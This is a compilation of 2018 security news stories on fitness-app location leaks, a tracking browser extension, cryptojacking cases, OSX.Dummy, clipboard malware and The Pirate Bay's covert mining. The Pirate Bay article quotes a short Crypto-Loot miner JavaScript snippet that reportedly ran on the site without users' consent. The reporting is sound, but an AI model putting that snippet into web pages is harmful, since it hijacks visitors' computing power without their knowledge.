STE WILLIAMS

+Comment Online investigations outfit Bellingcat has found that fitness tracking kit-maker Polar reveals both the identity and daily activity of its users – including soldiers and spies.

Many users of Polar’s devices and app appear not to have paid attention to their privacy settings, as a result a Bellingcat writer found 6,460 individuals from 69 countries. More than 200 of them left digital breadcrumbs around sensitive locations.

Bellingcat’s report claimed the Polar Flow social-fitness site produces more compromising data than other fitness-trackers than previous leaks: “Compared to the similar services of Garmin and Strava, Polar publicizes more data per user in a more accessible way, with potentially disastrous results.“

“Tracing all of this information is very simple through the site: find a military base, select an exercise published there to identify the attached profile, and see where else this person has exercised.”

Bellingcat notes that the big difference between Polar and Strava is that the former offers more comprehensive data, more easily, covering everything a user has uploaded to the platform since 2014.

US Pentagon scrambles after Strava base leaks. Here’s a summary of the new rules: ‘Secure that s***, Hudson!’

READ MORE

The investigation describes all sorts of interesting targets in the data: an officer whose air base hosts nuclear weapons; Western military personnel in Afghanistan; yet another officer whose profile carries his name, and whose location hosts drones. People exercising near their homes, and also near their workplaces – which happen to be intelligence agencies.

“We were able to scrape Polar’s site (another security flaw) for individuals exercising at 200+ of such sensitive sites, and we gathered a list of nearly 6,500 unique users. Together, these users had made over 650,000 exercises, marking the places they work, live, and go on vacation,” Bellingcat’s Foeke Postma wrote.

Polar told the publication it had updated its policy in August 2017 so accounts have more secure default settings, and the platform has blocked users from exploring its data while it investigates fixes.

Over the weekend, in response to the revelations, the Dutch Minister of Defence issued an edict that military personnel should remote fitness apps from their smartphones.

Running in circles

The Dutch response may well feel familiar because Shortly after Nathan Ruser of the Australian National University revealed the extent of the Strava leak in January this year, the Pentagon warned personnel to lock down their privacy settings.

The official response included an investigation in the US military, but such things proceed relatively slowly. Army Colonel Robert Manning III said at the time: “DoD personnel are advised to place strict privacy settings on wireless technologies and applications”

However, even if military and intelligence users had locked down their defaults after that warning, Bellingcat’s Postma wrote that the platform still kept old data public until it stopped Internet passers-by browsing peoples’ records.

Yes, people with sensitive jobs need to be careful with social technologies, but it seems to be an open question just how well people in general understand how much data leaks when they sign up for online services.

The US military is, after all, easily large enough to act as a proxy for the whole population, and people at scale aren’t paying close attention to how their data leaks, until it stings them. ®

Sponsored:
Minds Mastering Machines – Call for papers now open

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2018/07/09/fitness_app_polar_data_leak/

Roundup The week surrounding America’s “Huzzah, we kicked out the Brits, and will now spell color any way we like” Day, on July 4, is traditionally one of the slowest periods in the annual business tech news cycle.

IT security, on the other hand, never rests. We’ve covered Google cracking down on non-HTTPS sites, Fortnite cheats getting pwned by malware, a fascinating interview with plane hacker Chris Roberts, and even a new (and poorly written) computer crime novel cowritten by Bill Clinton.

But there were other stories bubbling under, so here’s the best of the rest.

Time to get patching Ubuntu

Canonical has issued a rash of new security patches for its Ubuntu GNU/Linux distribution – updates that should be installed as soon as possible.

Not all of these fixes are alike. If you’re running a system with an AMD processor, one patch removes an earlier update that was supposed to address the Spectre CPU vulnerability. That microcode-level mitigation left some AMD-powered systems unable to boot, and now has been given the boot from Ubuntu Linux computers.

There’s also a security update for Firefox packages, following critical fixes from Mozilla. Ubuntu’s handling of PHP, Devscripts, and Archive Zip have also been given some secure code lovin’.

Regarding the Firefox updates, the security fixes were publicly issued by the browser’s maker Mozilla on June 25 and 26, however, are only now making their way to Ubuntu users. Other Linux flavors, such as Debian, pushed out the Firefox security update days earlier to users.

We asked Canonical why the week-long hold up, and a spokesperson told us the Ubuntu team was “waiting for the point release from Mozilla before pushing out updates.” The Firefox snap is kept “up to date so users can install that if they want to run the latest version.”

Still, the delay irritated some, it meant people were left running vulnerable software while miscreants potentially developed exploits for the disclosed bugs.

Infosec consultant, Stephan Verbücheln, based in Switzerland, told us earlier this week before Ubuntu updated its Firefox packages: “Despite this version fixing several security issues with critical risk, Ubuntu has still not updated the version in their repositories. There is no reason to assume that Ubuntu staff was overwhelmed by a sudden Mozilla release.”

In any case, if you use Firefox, get the latest updates.

Beware the Therminator

No, not Arnie with a lisp, but instead an interesting bit of research into side-channel data-leaking techniques.

Boffins at the University of California Irvine has been doing some interesting work [PDF] into thermal imaging and passwords. Humans run quite hot thanks to our mammalian status, and it turns out warm fingerprints left on key tops after typing in a password can be observed to snatch one’s login credentials.

You might think that the poor thermal conductivity of the average keyboard was negligible, but it turns out a heat-sensing camera can spot keystrokes up to 45 seconds after the keys are pressed. It’s a canny bit of research that led the eggheads to postulate that we should consider dumping passwords altogether for a better system.

It’s a cute surveillance technique, but one can’t help wondering about its practicality. After all, if you have the kind of access to a target that allows this kind of thermal imaging then why not just use a plain old camera to watch typed passwords, install a keylogger, or just look over their shoulder.

Quick links

• On July 11, the US Senate committee for commerce, science and transportation will hold a hearing on the data-leaking Spectre and Meltdown CPU flaws.
• Microsoft security researcher Matt Oh has taken apart a malware-laced PDF, reverse-engineering it to great and fascinating detail. Code within the document exploits, now fixed, bugs in Windows and Adobe Acrobat to hijack the machine when opened.
• Watch out for this macOS software nasty: OSX.Dummy, which is installed by marks if they are tricked into running a command in Terminal that downloads and runs the thing. The malware opens a backdoor, and makes a note of the Mac’s root password.
• We hope you’ve patched your HP iLO 4 server firmware for CVE-2017-12542, released in August 2017, because research and proof-of-concept exploit code is now floating around. The flaw can be abused to bypass authentication, and execute malicious code remotely. It can be as simple as sending 29 characters in a Curl request.
• Microsoft’s Windows 7 Defender has started receiving malware updates again after a week’s hiatus.

Portly piracy suspect is pissed off

The continuing saga of Kim Dotcom opened another chapter when the former owner of one of the most notorious file-sharing websites, Mega Upload, lost his appeal against extradition.

The New Zealand courts ruled against Dotcom’s appeal against a verdict that would see him shipped off to the US to face charges of copyright infringement and fraud. His team has promised to appeal again to the country’s Supreme Court.

There had been earlier signs of hope for Dotcom, after a court ruling that he couldn’t be extradited for copyright infringement as the crimes occurred outside of New Zealand’s jurisdiction. But it was the fraud allegations that stuck.

Old dog, new tricks

One of the oldest families of malware, Rakhni, has received an upgrade.

The code has traditionally been used as a trojan to provide backdoor access to infected Windows PCs. Once installed, it can be used to scoop passwords and login details, but apparently that’s no longer enough, according to Kaspersky Lab.

Now the code’s masterminds have seen fit to add cryptocurrency-mining code into the software nasty. It’s adding insult to injury – first it steals your data, then your CPU cycles.

China perfects laser rifle

Something for the Flash Gordon fans: it seems that the Chinese have developed a laser rifle that actually works.

According to reports the compact, if rather ugly, rifle is dubbed the ZKZM-500 and has a range of half a mile. It can burn through clothing in seconds, burn bare skin, and ignite petrol tanks on cars. It’s now ready for mass production, and will be coming to counter-terrorism squads in the Middle Kingdom.

Given that America is already worried about laser weapons being used by the Chinese military against its forces, this new weapon could spark a new, light-based arms race.

Move over Nigeria, Botswana’s in town

When you think African computer crime, Nigeria is the first place that comes to mind, thanks to numerous princes of the locale trying to snatch people money.

But there’s a new kid on the block, according to police in the southern African state of Botswana. In the last few months, the nation’s cops have been deluged with complaints from businesses far and wide that are getting ripped off online by miscreants within the country.

There’s the traditional business invoice scams, but also fraudulent suppliers dropping off the radar once the money for orders has been sent, and even some enterprising scumbags using fake Facebook accounts to further aid scamming. ®

Sponsored:
Minds Mastering Machines – Call for papers now open

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2018/07/07/security_roundup/

Firefox and Chrome have removed a browser extension from their stores following revelations it was phoning home with users’ web-surfing histories.

The “Stylish” plug-in gained popularity because it let users configure sites’ appearance, rather than accepting the designers’ decisions.

However – stop us if you’ve heard this one before – the code changed hands last year and the new owners expanded its data slurping activities.

Software engineer Robert Heaton decided to take a look at what was being sent to Stylish’s owners, analytics company SimilarWeb, and was horrified.

As Heaton blogged, “HTTP requests that send a large blob of obfuscated data to a URL ending in /stats are almost never good news for users.”

While the SimilarWeb privacy policy for Stylish says it only collects anonymous data, Heaton found it was attaching an identifier to the data returned to the company.

“I looked closer at the decoded payload and noted a unique tracking identifier”, he wrote, adding “it only takes one tracking request containing one session cookie to permanently associate a user account with a Stylish tracking identifier. This means that Stylish and SimilarWeb still have all the data they need to connect a real-world identity to a browsing history, should they or a hacker choose to.”

Mozilla’s add-on assessors decided Stylish, as it now stands, is out of line and made the extension unavailable to Firefox users (although it requires manual removal for current users).

A post from Andreas Wagner was blunt about the reason: “We decided to block because of violation of data practises outlined in the review policy.”

Still popular after it’s gone

As you can see above, Stylish was popular enough to be a front-page search result for “Chrome extensions”, but it’s now gone from the Google extensions store.

The Register asked SimilarWeb for comment. ®

PS: There is an open-source fork of Stylish sans analytics and tracking – Stylus.

Sponsored:
Minds Mastering Machines – Call for papers now open

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2018/07/05/browsers_pull_stylish_but_invasive_browser_extension/

A Japanese man has received a suspended sentence for using the Coinhive cryptominer in a failed attempt to turn an illicit profit.

Masato Yasuda, 24, was told he’d be jailed for a year if he reoffended in the next three years over a scam that earned him just £34. The case is thought be the first criminal prosecution over so-called cryptojacking worldwide.

Yasuda, an unemployed man from the city of Amagasaki in Hyōgo Prefecture, had hoped to, er, coin it in by planting Coinhive’s Monero-mining JavaScript on the PCs of third-party victims in January and February. Instead of making bank, he made what would have been barely enough to cover any taxi fare home from the police station.

Yasuda embedded the Coinhive JavaScript library inside a supposed game cheat tool that was offered for download, his defence lawyer told Bitcoin.com. The 90 resulting downloads brought in around 5,000 Japanese yen worth of Monero cryptocurrency (£34 or $45).

“The defendant regretted what he did, learning information ethics and other matters,” the sentencing judge Ryo Kato said, according to Japanese news outlet The Mainichi.

“This is the first criminal case of cryptojacking in the world that I’m aware of,” Troy Mursch, a security researcher active in tracking cryptojacking abuse, told El Reg. “Tracking down perpetrators can be difficult as Coinhive doesn’t require any user identification verification. After the mined Monero is paid out to a wallet, it’s basically untraceable beyond that.”

Adware, cracked games and pirated software have all been used by cybercriminals to secretly infect PCs with crypto-mining malware. Even more commonly, hackers plant code on compromised web pages so that the PCs of visiting surfers are press-ganged into mining, a practice most associated with the growing problem of cryptojacking.

Japanese authorities last month arrested 16 cryptojacking suspects as part of a local clampdown, according to reports.

Prosecutors reckon the 16 suspects hacked sites and inserted the Coinhive library into their code. The biggest earner among the 16 suspects allegedly made about 120,000 Japanese yen (£819, $1,085). ®

Sponsored:
Minds Mastering Machines – Call for papers now open

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2018/07/06/coinhive_conviction_japan/

The Israeli hacking firm says its stolen software is worth hundreds of millions of dollars.

NSO Group reports a former employee stole mobile hacking tools and tried to sell them on the Dark Web for $50 million in digital currency, according to a new indictment.

The Israeli hacking firm, primarily known for selling malware to break into iPhones, believes its mobile spy tools might have been sold to threat actors. A former employee allegedly stole malware, worth hundreds of millions of dollars, prior to his dismissal and attempted to sell it. The person he contacted as a potential buyer reported the illicit activity to NSO Group.

On June 5, officials arrested a suspect who previously worked for NSO Group as a senior programmer with access to corporate servers and privately owned tools, Reuters reports. He has been charged with employee theft, attempting to sell security software unlawfully, and attempting to harm property in a way that could prove harmful to state security.

Read more details here.

Dark Reading’s Quick Hits delivers a brief synopsis and summary of the significance of breaking news events. For more information from the original source of the news item, please follow the link provided in this article. View Full Bio

Article source: https://www.darkreading.com/attacks-breaches/former-nso-group-employee-steals-sells-spy-tools/d/d-id/1332229?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

OSX.Dummy depends on substantial help from an unwary victim.

A new strain of MacOS malware is targeting those who like to discuss their cryptocurrency investing in Slack or Discord groups. It depends on a certain level of naiveté on the part of the victim – a level that resulted in the strain being labeled OSX.Dummy.

The social engineering attack presents a request from a user identifying themselves as an administrator of the group. They ask the victim to run a lengthy command in a terminal window, then ignore the 34 Mbyte file that is downloaded. If the victim does both of these things, they find that their Macintosh has been hijacked by a hacker using a CC server in the Netherlands.

In a comment supplied to Dark Reading, Ryan Benson, senior threat researcher at Exabeam said, “A lot of otherwise non-technical people have jumped on the cryptocurrency bandwagon and want to get involved. Cryptocurrencies are inherently technical, so these less-technical users may be used to following technical how-tos without really understanding what the commands they run are doing. This puts them in dangerous territory and ripe for an attack like this, even if it is ‘dumb.'”

For more, read here and here.

Dark Reading’s Quick Hits delivers a brief synopsis and summary of the significance of breaking news events. For more information from the original source of the news item, please follow the link provided in this article. View Full Bio

Article source: https://www.darkreading.com/attacks-breaches/new-malware-strain-targets-cryptocurrency-fans-who-use-macs/d/d-id/1332230?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

At a Moscow-based security conference, Russian President Vladimir Putin said countries should work together amid the rise of cyberthreats.

Russian President Vladimir Putin called on countries to better cooperate in the fight against cyberattacks during his address at a Moscow security conference.

Putin discussed how cyberthreats have escalated around the world and said “some nations’ egoism” and “attempts to act squarely to their own advantages” have damaged data stability around the world, ABC News reports. 

Russia has recently joined efforts with European countries on an agreement to protect personal data, Putin said. He claims Russia would develop a system to automate data exchange between the private sector and law enforcement to improve on security, the report states.

The topic of Russian election meddling was not addressed.

Read more details here.

Dark Reading’s Quick Hits delivers a brief synopsis and summary of the significance of breaking news events. For more information from the original source of the news item, please follow the link provided in this article. View Full Bio

Article source: https://www.darkreading.com/threat-intelligence/putin-pushes-for-global-cybersecurity-cooperation/d/d-id/1332232?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

A migrating, tagged, male white stork—known to the Polish environmentalists who were tracking him as “Kajtek”—blipped out of contact on 26 April.

That, however, did not stop him from making good use of the SIM card in his GPS tracker, with which the bird—or somebody who found the GPS device and picked it apart in order to get at the card—racked up a $2,700 phone bill.

As IFL Science reports, Kajtek was last located at the Blue Nile valley in Sudan, on his way back home to Poland after successfully making his annual 6,000-kilometer (3,700-mile) trip to Africa, when his GPS tracker showed that he had stopped moving.

White storks aren’t endangered, though their habitats are threatened. The birds spend the warm summer months of the breeding season in parts of central and southern Europe—including in Poland—the Middle East, and west-central Asia before heading to Africa to spend the winter.

When his GPS tracker showed that Kajtek had stopped moving, researchers at the environmental group Grupa EkoLogiczna—EcoLogic—assumed the bird was dead. They had placed the tracker on him in April 2017: a “fairly routine” practice, as you can see by the many accounts of tagging white storks that the group posts to Facebook.

It was 26 April when things got weird. That’s when the scientists who were monitoring Kajtek’s tracker noticed that the bird’s signal again started to move, taking a roundabout, 25-kilometer (16-mile) trip before it went dead.

Then, a number of weeks later, on 7 June, EcoLogic got the giant bill from its phone company. According to The Register, the group said in June that someone pulled apart the tracker to get at the SIM card, then used it for a marathon call-everywhere-and-everyone spree.

EcoLogic told IFL Science that it doesn’t know who made the calls, but they’ll likely have to fork over the money for the phone bill out of their own pockets.

On average, white storks measure 100–115 cm (39–45 in) from beak tip to tail end, with a 155–215 cm (61–85 in) wingspan that lets them ride air thermals on their long journeys. They skip the Mediterranean in order to get into those thermals, which don’t form over water. In order to do that, they detour via the Levant in the east or the Strait of Gibraltar in the west.

Given the time lag between Kajtek’s cessation of movement and the phone-calling marathon, it seems unlikely that this magnificent beast was shot down just so somebody could get their hands on his tracker’s SIM card.

At least, let’s hope that’s not what happened. It’s bad enough that endangered animals are at growing risk of GPS “cyber-poachers”—including photographers, hunters and professional poachers—who use trackers to hunt them down.

Follow @LisaVaas
Follow @NakedSecurity

Article source: http://feedproxy.google.com/~r/nakedsecurity/~3/rx4FcWVTAyc/

Malware that rummages through your clipboard is not new – after all, the clipboard is how you transfer data that’s important enough to move between two applications, so the contents of the clipboard are self-selectingly interesting to crooks.

In fact, in an amusing irony, the ⌘ key used on Macs for the copy-and-paste combinations ⌘C and ⌘V (the equivalent of Ctrl+C and Ctrl+V on Windows) is officially known in Unicode as the PLACE OF INTEREST SIGN.

Better yet for cybercrimals, but worse still for you, is that the clipboard is often the primary way that you “type in” critical machine-generated data that’s a hassle to enter character-by-character each time you need it.

You probably use the clipboard yourself all the time for “text strings of interest” such as passwords like P455//()Rdz, invoices or account numbers like 2BBE-64-903555X2-B, and cryptocurrency payment addresses like 1J87dFm6­2avMYZjW­aituZTw9­PXBvaguEMr.

We recently wrote about a malware sample with the unassuming name of Troj/Agent-AZHF that spies on your clipboard specifically to look out for cryptocoin addresses that you’re about to send money to – it knows how to recognise addresses for Bitcoin, Dogecoin, Litecoin, Dash, Ethereum, Namecoin, Zcash and Peercoin.

Clipboard-manipulating malware might sound pretty unspohisticated at first, but it can steal digital content from you without the hassle of cracking passwords, reading cryptocoin wallets, peeking at private keys, and even without making any network connections to suspicious command-and-control servers.

Watch our video to learn how clipboard malware works, and what to do about it…

If you have any questions or comments about the video, please leave them below and we’ll do out best to answer them.

Thanks for watching, and remember: after you copy-and-paste, check twice, click once.

Follow @NakedSecurity
Follow @duckblog

Article source: http://feedproxy.google.com/~r/nakedsecurity/~3/sQ1eCbHd9jk/

Popular file sharing site The Pirate Bay seems to have returned to its old tricks again by mining cryptocurrency in visitors’ browsers without telling them. Last month, a user called okremix posted a complaint in Suprbay, which is the Pirate Bay’s official forum.

I wanted to upload my torrents to TPB and because of the current upload error (file not found) I leaved the tab open and noticed that my CPU is getting really hot.
I remember that TPB was testing background mining in the past so checked the source on upload page and there it was.

He posted a segment of JavaScript designed to mine for cryptocurrency.

    var miner=new CRLT.Anonymous('37efd635d0ec154de4d0b17dd1952aa3b5e88acd6bbe', {
        throttle:0.9,
    });
miner.start();

Browser-based cryptominers use code embedded in a web page to force your miner into solving the complex mathematical problems that earn cryptocurrency. Instead of doing it for you, though, they do it for someone else.

Occasionally, publishers will give you the option to mine for cryptocurrency if you don’t want to read their ads. More often, crooks hack someone’s website to embed the code without their knowledge.

Sometimes, as was the case with the Pirate Bay first time around at least, the site owner embeds the code themselves but doesn’t tell visitors. When the person visiting the website doesn’t know about the mining and doesn’t give their permission, that can be classified as cryptojacking.

The Pirate Bay has done this before, using well-known miner Coinhive. This time, though, they seem to have opted for the relatively new cryptojacking service called Crypto-Loot (probably because it charges 12% commission on Monero mining, compared to Coin-Hive’s 30% commission).

Both Coinhive and Crypto-Loot focus on mining Monero, which has become the cryptocurrency of choice for cryptojackers for two reasons. First, it is CPU-friendly, meaning that miners can use a computer’s CPU in a browser without having to rely on expensive GPU hardware. Second, Monero is designed to be even more anonymous than Bitcoin, obfuscating sending and receiving addresses by default.

The mining script that okremix posted can no longer be found on the Crypto-Loot site. This is because it recently updated the code designed to connect publishers’ web sites to its own scripts and changing those scripts to avoid ad blockers. Now, it generates slightly new code.

Users responded to the news by questioning the Pirate Bay’s ethics and suggesting that they upload their files elsewhere. Forum admin Sid was less than impressed. He retorted:

Yeah, yeah, whatever. The time it takes to download a torrent is completely and utterly irrelevant.
All you require from TPB is a magnet link. Open the site. Find a torrent. Click the magnet link. Close the site. End of miner.
If you are ever on TPB for more than 5 minutes or so you’re doing it wrong.
And if you’re ever on TPB without an ad blocker you’re doing it doubly wrong.

Quite why Sid, an admin on the official Pirate Bay forum, would trash advertising, one of the group’ big revenue sources, is beyond us. Still, it’s worth looking at how much browser-based cryptomining might earn the organisation.

Only the Pirate Bay’s crew knows its real traffic numbers, but SimilarWeb suggests that it had nearly 200 million users in the last month with an average duration of just over 5 minutes. Plugging that into Crypto-Loot’s profit calculator shows earnings of $511 per day at the current difficulty.

Mind you, that follows a considerable slide in Monero value, which has tracked the broader cryptocurrency market’s downturn in recent months. Had the Pirate Bay been cryptojacking visitors at the height of Monero’s pricing in January, it could have netted well over $1500 each day.

Although stories have been surfacing this week about The Pirate Bay’s use of cryptominers, okremix’s post dates back to 8 June. We checked The Pirate Bay’s main .org site using an unprotected browser in a virtual machine yesterday, and found no cryptomining scripts. We also visited it with a browser using a cryptomining blocker that found nothing.

Does that mean that the Pirate Bay’s electron-hogging practices are done? Don’t bet on it. Yesterday the site introduced a new disclaimer at the bottom:

By entering TPB you agree to XMR being mined using your CPU. If you don’t agree please leave now or install an adBlocker.

When checking for miners and calculating potential profits, let’s also remember the slew of proxy Pirate Bay sites, designed to help users circumvent ISPs that block its main site in their countries. Visitors in these countries can use these sites to reach its lists of magnet links, which it maintains via a cunningly-distributed back-end architecture.

The Pirate Bay maintains a list of these sites, and allows anyone to set up a proxy and submit it for approval. It exercises pretty loose controls, with the only caveats being that people shouldn’t submit generic web proxies or put too many ads on their sites. That makes it pretty easy for an independent proxy creator to mine some cryptocurrency in visitors’ browsers on the side.

We found coin miners on some, but not all, of these proxy sites. One site we visited was using a Coinhive miner, and also added another script which, in spite of the ‘install an adBlocker’ claim at the bottom of the Pirate Bay page, is designed to thwart ad blockers.

We wonder if Sid knows?

Follow @NakedSecurity
Follow @dannybradbury

Article source: http://feedproxy.google.com/~r/nakedsecurity/~3/_myj9fOdYnA/